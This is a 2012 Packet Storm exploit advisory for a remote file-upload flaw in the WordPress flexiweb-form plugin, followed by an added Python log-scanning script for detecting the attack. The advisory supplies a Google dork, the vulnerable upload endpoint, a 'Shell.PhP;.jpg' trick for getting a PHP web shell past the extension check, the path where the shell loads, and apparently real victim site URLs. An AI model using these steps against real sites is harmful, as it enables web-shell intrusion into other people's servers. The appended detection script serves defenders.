WordPress Flexiweb-Form Shell Upload

2012-07-04T00:00:00
ID PACKETSTORM:114475
Type packetstorm
Reporter Mr.XpR
Modified 2012-07-04T00:00:00

Description

                                        
                                            `##################################################################  
  
  
[+] Exploit Title : WordPress flexiweb-form plugin Remote File Uploader  
  
[+] Google Dork : inurl:plugins/flexiweb-form/  
  
[+] Author : Mr.XpR  
  
[+] Download : http://www.flexiweb.com.au  
  
[+] Researcher Team : IRaNHaCK Security Team  
  
[+] Bug Level : High (RFU)  
  
[+] Test : 7 , Linux Back Track  
  
##################################################################  
  
  
[+]Exploit  
  
[-] http://Site.il/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[+]Sh3ll  
  
[-] Upload Shell PhP ==> Shell.PhP or Shell.PhP;.jpg  
  
[+]Load Shell  
  
[-] http://www.Site.il/patch/wp-content/plugins/flexiweb-form/images/Shell.php  
  
[+]Example :  
  
[-] http://michelle1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustop.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustoperella1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] More In Google ...  
  
  
Persian Gulf For Ever - Tnx To all Persian Hackerz  
  
Bax:  
  
Siamak Black - UnknowN - farbod ezrael - hell boy - all iranian hackerz   
`
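
Added example, not part of the original advisory: a log check a site owner can run to see whether the upload endpoint named above was hit and whether anything with a script extension (including mixed case and a trailing `;.jpg`) was requested from the plugin's `images/` directory. The Combined Log Format, the extension list and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote, urlsplit

PLUGIN = "/wp-content/plugins/flexiweb-form/"
UPLOAD_ENDPOINT = PLUGIN + "ajax/upload_img.php"
IMAGES_DIR = PLUGIN + "images/"
# Assumption: extensions this server may hand to the PHP interpreter.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jul/2012:10:00:01 +0000] "POST /wp-content/plugins/flexiweb-form/ajax/upload_img.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [04/Jul/2012:10:00:05 +0000] "GET /wp-content/plugins/flexiweb-form/images/Shell.PhP%3B.jpg HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [04/Jul/2012:10:01:00 +0000] "GET /wp-content/plugins/flexiweb-form/images/photo.jpg HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [04/Jul/2012:10:02:00 +0000] "GET /blog/wp-content/plugins/flexiweb-form/images/shell.php?x=1 HTTP/1.1" 404 0 "-" "-"',
]

def has_script_ext(filename):
    """True if any '.'- or ';'-separated suffix is a script extension."""
    parts = re.split(r"[.;]", filename.lower())
    return any(p in SCRIPT_EXTS for p in parts[1:])

def scan(lines):
    """Return (line_no, client_ip, rule, status) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        # Decode %3B etc. and drop the query string before matching.
        path = unquote(urlsplit(target).path).lower()
        start = path.find(PLUGIN)  # tolerate installs in a subdirectory
        if start < 0:
            continue
        rel = path[start:]
        if rel == UPLOAD_ENDPOINT and method == "POST":
            findings.append((n, ip, "upload-post", status))
        elif rel.startswith(IMAGES_DIR) and has_script_ext(rel.rsplit("/", 1)[-1]):
            findings.append((n, ip, "script-in-images", status))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `script-in-images` hit with a 200 status from the same client as an earlier `upload-post` is the pairing worth investigating first.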